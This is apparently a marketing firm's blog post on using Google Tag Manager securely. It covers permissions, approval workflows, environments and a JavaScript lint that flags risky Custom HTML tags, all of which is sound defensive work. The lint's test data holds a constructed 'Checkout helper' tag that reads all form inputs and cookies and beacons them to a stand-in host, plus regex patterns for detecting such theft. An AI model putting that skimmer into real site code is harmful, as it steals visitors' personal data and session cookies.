Google Tag Manager (GTM) is a powerful tool that enables marketing teams to track and improve their conversions. However, your engineering team might balk at implementing it on security grounds. This can result in lost ROI, lost opportunities to experiment, and lost growth.
It doesn’t have to be this way. Here’s why we view GTM as critical – and how you can partner with engineering to implement it securely.
What is Google Tag Manager?
Google Tag Manager is a deployment platform and management UI for hosting analytics and other tags that track events on your Web site, Web application, or smartphone apps. A tag can be anything from an embedded analytics pixel to arbitrary JavaScript. Popular tags include Google Analytics (general analytics), Microsoft Clarity (heat mapping), and Facebook (ad campaign event tracking).
You specify when a given tag fires. For example, it could fire on page load, once the visitor has scrolled a certain percentage of the page, or in response to a form submission.
Advantages of Google Tag Manager
Why implement Google Tag Manager? The simplest answer is that it enables marketing teams to manage Web site analytics tags without going through engineering.
Without GTM, there are only two ways for marketing to change tags on Web and app properties. One is to give marketing direct access to the Web site so they can change its HTML and templates themselves. That requires marketing to have a lot of technical know-how. It also means granting what is, frankly, overprivileged and potentially dangerous access.
The other is to ask engineering to make the change through their official dev promotion process. That makes engineering a bottleneck for all tag change requests.
By contrast, with GTM, engineering only needs to add the Google Tag Manager JavaScript code once. After that, marketers can add pixels and JavaScript without touching code. And they can make small tweaks - swap out analytics code, reconfigure tracking pixels, run experiments - without bothering their engineers.
GTM also makes the simple things simple. You can load tags only on certain pages, pause/unpause tags, and more - all without coding.
Finally, GTM unlocks a number of advanced features you would otherwise have to build into your Web site yourself. These include managing versions and environments, and previewing changes prior to deployment.
Security challenges with Google Tag Manager
Unfortunately, from engineering’s perspective, there’s a potentially scary down side to GTM.
As noted above, Google Tag Manager lets anyone with publish rights insert arbitrary JavaScript into your company's Web site, and that JavaScript runs with the same access to the page as your own code. That opens the door to two frightening scenarios:
- A malicious actor within your company uses this ability to insert JavaScript that steals sensitive customer data (addresses, credit cards, etc.).
- Someone on your team unknowingly copies and pastes malicious code from an arbitrary Web site that does the same thing.
This is why engineering teams might object to using GTM. In their eyes, the risk outweighs the reward.
How to implement Google Tag Manager securely
Frankly, this is a legitimate fear. As many as 58% of incidents involving compromised sensitive data are due to insider threats. Limiting internal access according to the principle of least privilege isn’t just a good idea - it’s mandatory.
However, from our standpoint, there’s too much downside in not implementing GTM.
Forcing all tag changes through engineering can increase the time it takes to deploy a change from one day to up to one month. This slows down your ability to deploy new analytics, make changes to understand user behavior, or adjust conversion behavior. These limitations can lower your total Return on Ad Spend (ROAS).
That’s why we recommend to our clients that they work closely with their engineering team to implement strict security controls and a workflow process around GTM changes. Specifically, we recommend the following:
Limit access
GTM lets you specify who in your company has access to tag management. You can control who has the right to add, edit, approve, and publish tags at a fairly granular level. GTM can also shut the door on arbitrary code altogether: declaring 'gtm.blocklist': ['customScripts'] on the dataLayer before the container snippet loads stops Custom HTML tags and Custom JavaScript variables from running at all, regardless of who publishes them. If your site only needs GTM's built-in tag templates, that single setting removes the scenarios above.
So, first things first: don't give access to anyone who doesn't need it. Keep the number of people with GTM access to an absolute minimum.
Be especially wary of granting access to temporary contractors. If you must, make sure they’re a fully vetted, insured, and trusted partner.
Remove unneeded access immediately
This is a big one, and many companies forget to do it. If someone leaves the company, remove their GTM (and any other related) access immediately. We've seen companies fail to do this, resulting in former employees who retain access to private business data for months, or even years, after they were terminated.
One security measure that helps here is never granting access to accounts outside of your organization. If your company uses Google Workspace, it can be tempting to simply add an outside collaborator's personal gmail.com address to GTM. That raises the odds that you'll neglect to remove the access later, which increases the risk of a data leak.
Instead, if someone needs access to data within your organization, create an organizational account for them. That way, when their time working with your org is done, your Google Workspace administrator can simply suspend or delete that account, removing their access to all organizational resources, including GTM, at once.
Use granular container management
Google Tag Manager supports containers, which segment your tags and their governing rules into separate buckets. You can define containers for different Web sites, AMP pages, and Android and iOS apps. Furthermore, beyond "No access", you can grant four levels of permission per container:
- Read
- Edit
- Approve
- Publish
Grant access only to the containers that a given individual needs. For example, a member of your team might be responsible for marketing on a subdomain but not for the main Web site. In this case, you can grant them Edit access to the subdomain’s container but only Read access to the main Web site’s container.
Use an approval workflow
These granular container permissions mean you can also set up an approval workflow for GTM changes. An approval workflow can keep engineering stakeholders in the loop without pushing the overhead of shipping code changes into their laps.
For example, you may define container permissions for a Web container as follows:
- Marketing Assistant: Has Read, Edit container permissions
- Technical Approver (Software Development Engineer/Manager, IT Support Engineer, or similar technical role): Has Edit and Approve container permissions
- Marketing Manager: Has Edit and Publish permissions
With these permissions set up, an approval workflow might work as follows:
- The Marketing Assistant inserts a new JavaScript tag
- The Technical Approver reviews the tag's code in GTM: where it sends data, whether it reads form fields, cookies or browser storage, whether it loads further scripts from hosts the team has not agreed to, and whether it is obfuscated. They Approve it if it is benign, or reject it and send it back to the Marketing Assistant if anything looks questionable
- Once approved, the Marketing Manager publishes the approved container version
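To give the Technical Approver's review some structure, here is an added example (not code from the original post, from ercule or from Google) that lints the Custom HTML tags in a GTM container export (Admin > Export Container) against a host allowlist and a handful of source patterns associated with data theft. The export layout it reads (containerVersion.tag[] entries with type "html" and a parameter keyed "html") is the one GTM produces; the allowed-host list, the two Custom HTML tags and the hostnames in them are constructed for the example.

```javascript
// Added example: a pre-approval lint over a GTM container export.
// The layout (containerVersion.tag[], type "html", parameter key "html") is the
// one GTM produces from Admin > Export Container; the tags below are
// constructed for this example, not taken from a real site.

// Hosts the team has agreed tags may load from or send data to (assumed list).
const ALLOWED_HOSTS = new Set([
  "www.googletagmanager.com",
  "www.google-analytics.com",
  "connect.facebook.net",
  "www.clarity.ms",
]);

// Source patterns that call for a human look before a tag is approved.
// Each is a heuristic: a match is a reason to read the tag, not proof of abuse.
const RISKY_PATTERNS = [
  ["reads document.cookie", /document\.cookie/],
  ["reads form field values", /\.value\b/],
  ["enumerates inputs or forms", /querySelector(?:All)?\s*\(\s*['"`](?:input|form|select|textarea)/i],
  ["dynamic code execution", /\b(?:eval|Function)\s*\(|setTimeout\s*\(\s*['"`]/],
  ["base64 or escape obfuscation", /\b(?:atob|btoa|unescape)\s*\(|\\x[0-9a-f]{2}/i],
  ["reads web storage", /\b(?:localStorage|sessionStorage)\b/],
];

// Constructed container export: one benign Custom HTML tag, one built-in tag
// (not custom code, so it is skipped), and one Custom HTML tag that behaves
// like the data-theft scenario described in the text.
const CONTAINER_EXPORT = {
  exportFormatVersion: 2,
  containerVersion: {
    name: "v42 - add Clarity",
    tag: [
      {
        tagId: "1", name: "Clarity heatmap", type: "html",
        parameter: [{ type: "TEMPLATE", key: "html",
          value: '<script src="https://www.clarity.ms/tag/PROJECTID"></script>' }],
      },
      {
        tagId: "2", name: "GA4 Google tag", type: "googtag",
        parameter: [{ type: "TEMPLATE", key: "tagId", value: "G-XXXXXXX" }],
      },
      {
        tagId: "3", name: "Checkout helper", type: "html",
        parameter: [{ type: "TEMPLATE", key: "html", value: [
          "<script>",
          "(function () {",
          "  var f = document.querySelectorAll('input'), d = {};",
          "  for (var i = 0; i < f.length; i++) d[f[i].name] = f[i].value;",
          "  d.c = document.cookie;",
          "  new Image().src = 'https://cdn-metrics.example/p?q=' + btoa(JSON.stringify(d));",
          "})();",
          "</script>",
        ].join("\n") }],
      },
    ],
  },
};

// Pull every Custom HTML tag and its source out of an export.
function customHtmlTags(exportJson) {
  return (exportJson.containerVersion.tag || [])
    .filter((t) => t.type === "html")
    .map((t) => ({
      name: t.name,
      html: ((t.parameter || []).find((p) => p.key === "html") || {}).value || "",
    }));
}

// Every hostname the tag refers to by absolute or protocol-relative URL.
function externalHosts(html) {
  const hosts = new Set();
  for (const m of html.match(/(?:https?:)?\/\/[^\s'"`<>)]+/gi) || []) {
    try {
      hosts.add(new URL(m.startsWith("//") ? "https:" + m : m).hostname);
    } catch (_) {
      // Not a parseable URL after all; ignore it.
    }
  }
  return [...hosts];
}

// Review one tag: unknown hosts or any risky pattern means a human must read it.
function reviewTag(tag, allowedHosts = ALLOWED_HOSTS) {
  const hosts = externalHosts(tag.html);
  const unknownHosts = hosts.filter((h) => !allowedHosts.has(h));
  const findings = RISKY_PATTERNS.filter(([, re]) => re.test(tag.html)).map(([label]) => label);
  const verdict = unknownHosts.length === 0 && findings.length === 0 ? "ok" : "needs review";
  return { name: tag.name, hosts, unknownHosts, findings, verdict };
}

// Review every Custom HTML tag in an export; anything not "ok" goes back to its author.
function reviewContainer(exportJson, allowedHosts = ALLOWED_HOSTS) {
  return customHtmlTags(exportJson).map((t) => reviewTag(t, allowedHosts));
}

for (const r of reviewContainer(CONTAINER_EXPORT)) {
  console.log(`${r.verdict.padEnd(12)} ${r.name}: hosts=${r.hosts.join(",") || "-"} findings=${r.findings.join("; ") || "-"}`);
}
```

Run against the constructed export, the Clarity tag passes (its only host is on the allowlist and it matches no pattern), while "Checkout helper" is sent back: it talks to a host nobody agreed to and reads form values and cookies. The patterns are deliberately broad; the point is to make the approver read the flagged tag, not to replace that reading.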
You can make this process even more rigorous with GTM environments. Environments are not separate containers: they are named publishing targets within one container (the built-in Live, plus any you define such as dev or staging), each with its own container snippet, and you publish a specific container version to each of them. You can publish an approved version to a staging environment, let stakeholders preview it there, and only then publish that same version to Live.
Conclusion
As Uncle Ben said, with great power comes great responsibility. Google Tag Manager makes it easy to adjust marketing tactics on the fly - but carries a huge potential risk. Fortunately, GTM also contains the tools you need to develop a safe and secure workflow for promoting changes without sacrificing speed.
Need help running Google Tag Manager? ercule can get you set up with GTM as well as a full content strategy for fueling growth. Contact us today to get the ball rolling.